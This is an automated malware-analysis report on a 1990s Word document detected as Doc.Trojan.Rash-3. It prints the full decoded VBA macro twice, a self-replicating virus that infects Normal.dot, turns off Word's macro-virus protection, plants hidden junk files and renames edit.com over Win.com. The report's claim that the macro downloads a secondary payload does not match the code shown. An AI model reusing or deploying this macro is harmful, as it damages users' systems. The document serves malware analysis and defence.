Office (OLE) malware analysis — malicious · d5673b1736628e51

MALICIOUS

Office (OLE)

40.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: bf0a576c80f910807103b5f1380cf1a7 SHA-1: ca2312236d28182391fe498ce6e55a820282ae9f SHA-256: d5673b1736628e51ace7070cda5f47e06384120b7d3f9f59cf1dee8813a2b195

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon file opening. The ClamAV detection 'Doc.Trojan.Rash-3' further confirms its malicious nature. The VBA code appears to be obfuscated and truncated, but the presence of the Document_Open macro strongly suggests an attempt to download and execute a secondary payload.

Heuristics 3

ClamAV: Doc.Trojan.Rash-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Rash-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9889 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9889 bytes
SHA-256: `69668009032b81f4749a15b4e48df06819cbbce2b6105f986f1441cc56738fba`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Shock() Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Rem + Âèðóñíàÿ ëàáîðàòîðèÿ Äàíèëà Èãîðåâà ã.Ïèò-Ñàíòåðáóðã 1999+ Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Document_Close End Sub Private Sub Porcher() Dim bas(190) Namer = "Ïîð÷àÄåÃåíåðàòîð" Rem ++++++++++++++++++++++++++ Rem ++ +++++ +++++++ ++++ Rem ++ +++++ ++++ +++++++ ++++ Rem ++ +++++ ++++ +++++++ ++++ Rem ++ +++++ ++++ +++++++ ++++++++ Rem ++ +++++ +++++++ ++++++++++++ Rem ++ ++++ +++++ +++++++ ++++++++++++++ Rem ++ +++++ +++++ ++++++++++++ Rem +++++++++++++++++++++++++++++ bo1 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ bo2 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ KK = 0 If bo1 <> "Private Sub Shock()" Then Set bst = NormalTemplate.VBProject.VBComponents.Item(1) KK = 1 End If If bo2 <> "Private Sub Shock()" Then Set bst = ActiveDocument.VBProject.VBComponents.Item(1) KK = 1 End If Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ If KK > 0 Then Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ bol = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines For bi = 1 To bol bas(bi) = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(bi, 1) Next bi Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ For bi = 1 To bol bst.CodeModule.InsertLines bi, bas(bi) Next bi Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ End If Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Negr = "KilleRRRRRash" For bi = 1 To 40 bnam = "c:\" For bj = 1 To 6 bkk = Int(10 * Rnd) + 1 bnam = bnam + Mid(Negr, bkk, 1) Next bj Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ bnam = bnam + ".sys" Open bnam For Output As #1 Seek #1, 65535 * 8 Print #1, "×òîáû ïîìíèëè... FOREVER!!!" Close #1 SetAttr bnam, 6 Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Next bi Options.ConfirmConversions = 0: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0 Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Name "c:\Windows\Command\edit.com" As "C:\Windows\Win.com" Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ End Sub Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Private Sub Document_Open() Shock End Sub Private Sub Document_Close() Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ daa = Date Porcher Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ End Sub ' Processing file: /opt/analyzer/scan_staging/2f425820287f4a7bbd3b15eeef653e6d.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 10670 bytes ' Line #0: ' FuncDefn (Private Sub Shock()) ' Line #1: ' Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" ' Line #2: ' Rem 0x0040 " + Âèðóñíàÿ ëàáîðàòîðèÿ Äàíèëà Èãîðåâà ã.Ïèò-Ñàíòåðáóðã 1999+" ' Line #3: ' Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" ' Line #4: ' ArgsCall Document_Close 0x0000 ' Line #5: ' EndSub ' Line #6: ' FuncDefn (Private Sub Porcher()) ' Line #7: ' Dim ' OptionBase ' LitDI2 0x00BE ' VarDefn bas ' Line #8: ' LitStr 0x0010 "Ïîð÷àÄåÃåíåðàòîð" ' St Namer ' Line #9: ' Rem 0x001B " ++++++++++++++++++++++++++" ' Line #10: ' Rem 0x001B " ++ +++++ +++++++ ++++" ' Line #11: ' Rem 0x001B " ... (truncated)

SHA-256: 69668009032b81f4749a15b4e48df06819cbbce2b6105f986f1441cc56738fba

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Shock()
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rem + Âèðóñíàÿ ëàáîðàòîðèÿ Äàíèëà Èãîðåâà  ã.Ïèò-Ñàíòåðáóðã   1999+
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Document_Close
End Sub
Private Sub Porcher()
Dim bas(190)
Namer = "Ïîð÷àÄåÃåíåðàòîð"
Rem ++++++++++++++++++++++++++
Rem ++      +++++ +++++++ ++++
Rem ++ +++++ ++++ +++++++ ++++
Rem ++ +++++ ++++ +++++++ ++++
Rem ++ +++++ ++++ +++++++ ++++++++
Rem ++      +++++ +++++++ ++++++++++++
Rem ++ ++++ +++++ +++++++ ++++++++++++++
Rem ++ +++++ +++++       ++++++++++++
Rem +++++++++++++++++++++++++++++
bo1 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
bo2 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
KK = 0
If bo1 <> "Private Sub Shock()" Then
Set bst = NormalTemplate.VBProject.VBComponents.Item(1)
KK = 1
End If
If bo2 <> "Private Sub Shock()" Then
Set bst = ActiveDocument.VBProject.VBComponents.Item(1)
KK = 1
End If
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
If KK > 0 Then
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
bol = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
  For bi = 1 To bol
   bas(bi) = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(bi, 1)
  Next bi
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  For bi = 1 To bol
   bst.CodeModule.InsertLines bi, bas(bi)
  Next bi
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
End If
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Negr = "KilleRRRRRash"
For bi = 1 To 40
 bnam = "c:\"
  For bj = 1 To 6
   bkk = Int(10 * Rnd) + 1
   bnam = bnam + Mid(Negr, bkk, 1)
  Next bj
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 bnam = bnam + ".sys"
 Open bnam For Output As #1
 Seek #1, 65535 * 8
 Print #1, "×òîáû ïîìíèëè... FOREVER!!!"
 Close #1
 SetAttr bnam, 6
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Next bi

Options.ConfirmConversions = 0: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Name "c:\Windows\Command\edit.com" As "C:\Windows\Win.com"
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
End Sub
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Private Sub Document_Open()
Shock
End Sub

Private Sub Document_Close()
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
daa = Date
Porcher
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
End Sub


' Processing file: /opt/analyzer/scan_staging/2f425820287f4a7bbd3b15eeef653e6d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10670 bytes
' Line #0:
' 	FuncDefn (Private Sub Shock())
' Line #1:
' 	Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
' Line #2:
' 	Rem 0x0040 " + Âèðóñíàÿ ëàáîðàòîðèÿ Äàíèëà Èãîðåâà  ã.Ïèò-Ñàíòåðáóðã   1999+"
' Line #3:
' 	Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
' Line #4:
' 	ArgsCall Document_Close 0x0000 
' Line #5:
' 	EndSub 
' Line #6:
' 	FuncDefn (Private Sub Porcher())
' Line #7:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x00BE 
' 	VarDefn bas
' Line #8:
' 	LitStr 0x0010 "Ïîð÷àÄåÃåíåðàòîð"
' 	St Namer 
' Line #9:
' 	Rem 0x001B " ++++++++++++++++++++++++++"
' Line #10:
' 	Rem 0x001B " ++      +++++ +++++++ ++++"
' Line #11:
' 	Rem 0x001B "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.